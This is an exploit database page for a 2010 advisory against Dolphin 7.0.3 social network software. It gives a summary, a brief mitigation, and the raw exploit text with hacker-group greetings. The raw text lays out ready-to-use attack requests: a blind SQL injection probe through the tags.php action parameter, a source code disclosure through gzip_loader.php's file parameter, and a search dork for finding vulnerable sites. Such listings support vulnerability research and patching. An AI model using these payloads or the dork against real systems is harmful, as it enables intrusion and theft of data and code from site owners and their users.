header-logo
Suggest Exploit
vendor:
Dolphin
by:
anT!-Tr0J4n
7,5
CVSS
HIGH
Blind SQL Injection & Source Code Disclosure
89 (SQL Injection) & 522 (Information Exposure Through Source Code)
CWE
Product Name: Dolphin
Affected Version From: 7.0.3
Affected Version To: 7.0.3
Patch Exists: YES
Related CWE: N/A
CPE: a:boonex:dolphin
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Dolphin Mullti Vulnerability

An attacker can exploit a Blind SQL Injection vulnerability in Dolphin by sending a maliciously crafted HTTP request to the tags.php page with the action parameter set to a malicious SQL query. An attacker can also exploit a Source Code Disclosure vulnerability in Dolphin by sending a maliciously crafted HTTP request to the gzip_loader.php page with the file parameter set to a malicious file name.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries. Ensure that sensitive information is not exposed through source code.
Source

Exploit-DB raw data:

# Exploit Title: Dolphin Mullti Vulnerability

# Date : 29-10-2010

# Author : anT!-Tr0J4n

# Version      : 7.0.3

#DorK     : Powered by Dolphin
 
#Greetz   :    Dev-PoinT.com ~ inj3ct0r.com  ~ All Dev-poinT members and my friends

# Home    :    www.Dev-PoinT.com : http://inj3ct0r.com

#Email     :    D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com

# Software Link : http://sourceforge.net/projects/boonex-dolphin



======================================================
[>] Dolphin Blind SQL Injection Vulnerability
======================================================

http://server/Dolphin/tags.php?action=[BSQLi]

http://localhost/Dolphin/tags.php?action=1+and substring(@@version,1,1)=5 --> True

http://localhost/Dolphin/tags.php?action=1+and substring(@@version,1,1)=4 --> False


========================================================
Dolphin source code disclosure Vulnerability 
========================================================

[>] exploit ->

http://localhost/Dolphin/gzip_loader.php?file=(file name)


=-=-=-=--=-=-=-=-=--=-=-=-=-

#Greetz    :   Dev-PoinT.com ~ inj3ct0r.com ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil ; Cyber-Err0r ; Mr.Mh$TEr ; M [Zero] ; R3d-D3v1l

#special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member

# I'm anT!-Tr0J4n member from Inj3ct0r Team
#[+] Site            : Inj3ct0r.com
#[+] Support e-mail  : submit[at]inj3ct0r.com

Navigation

Suggest Exploit

Services By CQR